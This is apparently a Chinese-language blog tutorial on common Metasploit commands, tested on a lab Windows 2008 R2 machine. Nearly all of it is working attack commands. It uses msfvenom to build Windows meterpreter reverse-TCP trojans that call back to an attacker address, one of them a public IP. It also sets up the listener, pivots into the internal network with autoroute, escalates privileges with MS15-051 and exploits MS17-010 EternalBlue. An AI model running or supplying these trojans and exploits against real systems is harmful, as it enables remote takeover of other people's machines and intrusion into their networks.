0x00 简述
0x01基本操作
1.启动MSF
这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:
service postgresql start # 启动 postgresql数据库
msfconsole # 启动msf
这样就算是启动成功了,左下角会变成msf >
。
2.配置和生成木马
在kali下用ifconfig
查询当前攻击机的ip,用于生成木马和配置监听。
ifconfig # 查ip
当前ip为192.168.184.129。
首先使用msf生成exe木马命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=监听端口 -f exe /位置/test.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.184.129 LPORT=5555 -f exe -o /var/test.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=45.77.249.160 LPORT=6666 -f exe -i 50 -o c:/xx.exe
这里监听5555端口,配置生成木马。监听面板配置命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 45.77.249.160
set LPORT 6666
exploit
这里开始监听,当木马被运行时,这里会接收到并返回一个meterpreter。
3.上线
里我用Windows2008R2虚拟机测试了下上线。
成功。
执行列目录ls
:
执行shell
操作命令行:
回到meterpreter,这里可以继续探测内网。
getuid # 查看当前用户
可以通过获取网段增加路由的方式对内网环境的其他主机继续探测。
run get_local_subnets # 获取网段
run autoroute -s 192.168.184.0 -n 255.255.255.0
# 增加路由
run autoroute -p # 查看路由设置
0x02 使用MSF提权
这里对Windows2008R2虚拟机提权。
1.查找exp
首先需要查找EXP。使用serach
命令。
search MS15-051 # 这里直接使用MS15-051
2.利用
这里msf search一直查不到东西。
但是具体流程是选用MS15-051进行提权,再打开一个msf进行监听。查看权限即提权成功。
exploit/windows/local/xxx
set session 10
exploit
0x03 利用MS17010
1.配置exp
目标机IP:192.168.184.131
系统:windows 2008 R2
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.184.131
set LHOST 45.77.249.160
set LPORT 6666
show options
exploit
2.利用
配置完目标机直接执行命令exploit
。
成功的话会提示win并且返回一个meterpreter。
成功。
转载请注明:Adminxe's Blog » Metasploit常用操作命令